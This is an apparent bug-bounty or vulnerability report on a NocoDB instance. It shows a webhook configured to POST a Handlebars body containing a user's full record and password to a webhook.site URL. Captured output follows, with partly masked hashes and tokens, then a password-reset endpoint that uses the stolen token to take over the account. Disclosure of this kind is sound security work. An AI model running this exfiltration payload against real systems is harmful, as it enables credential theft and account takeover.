Through the Webhook functionality, the attacker is able to use Handlebars to capture sensitive user data.
Capturing the email_verification_token, which through the API I found the PasswordForget function, enabling account takeover via password reset.
URL: "https://webhook.site/#!/XXXXXX"
METHOD: "POST"
EVENT: "After Insert"
BODY: "{{ json user }} {{ user.password }}"
{
"id": "us_******",
"email": "[email protected]",
"password": "$2a$10$wMm3MPZEyx.MYEC0*******",
"salt": "$2a$10$wMm3MP*******",
"firstname": null,
"lastname": null,
"username": null,
"refresh_token": "4fe1fbc72603a810f57db95b2a2********",
"invite_token": null,
"invite_token_expires": null,
"reset_password_expires": "2022-06-07T22:12:34.750Z",
"reset_password_token": "3175d930-4557-4d**************",
"email_verification_token": "716c8943-e4a7-************",
"email_verified": null,
"roles": "editor",
"created_at": "2022-06-07T19:31:30.670Z",
"updated_at": "2022-06-07T19:31:30.670Z",
"isAuthorized": true
}
Endpoint_final: "https://nocodb-xpl.herokuapp.com/api/v1/db/auth/password/reset/ + reset_password_token"
https://drive.google.com/file/d/1BLqcEHmPIE6sj9JeC6sCSEPB6dQVWXSk/view?usp=sharing